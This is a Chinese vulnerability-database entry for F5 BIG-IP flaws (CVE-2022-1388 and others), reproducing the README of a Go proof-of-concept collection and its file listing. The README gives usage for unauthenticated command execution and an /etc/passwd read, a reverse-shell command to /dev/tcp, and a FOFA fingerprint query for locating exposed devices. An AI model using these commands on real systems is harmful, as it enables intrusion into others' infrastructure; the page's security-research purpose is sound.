关联漏洞
标题:
F5 BIG-IP 访问控制错误漏洞
(CVE-2022-1388)
描述:F5 BIG-IP是美国F5公司的一款集成了网络流量管理、应用程序安全管理、负载均衡等功能的应用交付平台。 F5 BIG-IP 存在访问控制错误漏洞,攻击者可以通过未公开的请求利用该漏洞绕过BIG-IP中的iControl REST身份验证来控制受影响的系统。
描述
CVE-2020-5902 CVE-2021-22986 CVE-2022-1388 POC集合
介绍
# F5-BIG-IP POC
go语言编写CVE-2020-5902 CVE-2021-22986 CVE-2022-1388 POC集合 后续会增加F5其他POC
author:160team.west9B
**仅限用于安全研究人员在授权的情况下使用,遵守网络安全法,产生任何问题,后果自负,与作者无关。**
# 01-基本介绍
F5 POC合集:
CVE-2020-5902:F5 BIG-IP远程代码执行漏洞
CVE-2021-22986:F5 BIG-IP iControl REST未授权远程命令执行漏洞
CVE-2022-1388:身份验证绕过远程命令执行
# 02-使用说明
## usage: ./F5-BIG-IP -u url
CVE-2020-5902验证使用任意文件下载,返回/etc/passwd 则漏洞存在
CVE-2021-22986,CVE-2022-1388 POC默认执行id命令,返回{id}则漏洞存在,可使用-c自定义命令
## 反弹shell
usage: ./cve-2022-30525.exe -m exp -u url -c bash -i >& /dev/tcp/xxxx/1377 0>&1
# Screenshots
# fofa
icon_hash="-335242539"
文件快照
[4.0K] /data/pocs/9bc37453ff32689972d635b688b1bb3dc026a1a7
├── [ 673] CVE-2020-5902.go
├── [1.3K] CVE-2021-22986.go
├── [1.3K] CVE-2022-1388.go
├── [ 856] F5.go
├── [ 22K] poc1.png
├── [ 88K] poc.png
└── [1.0K] README.md
0 directories, 7 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。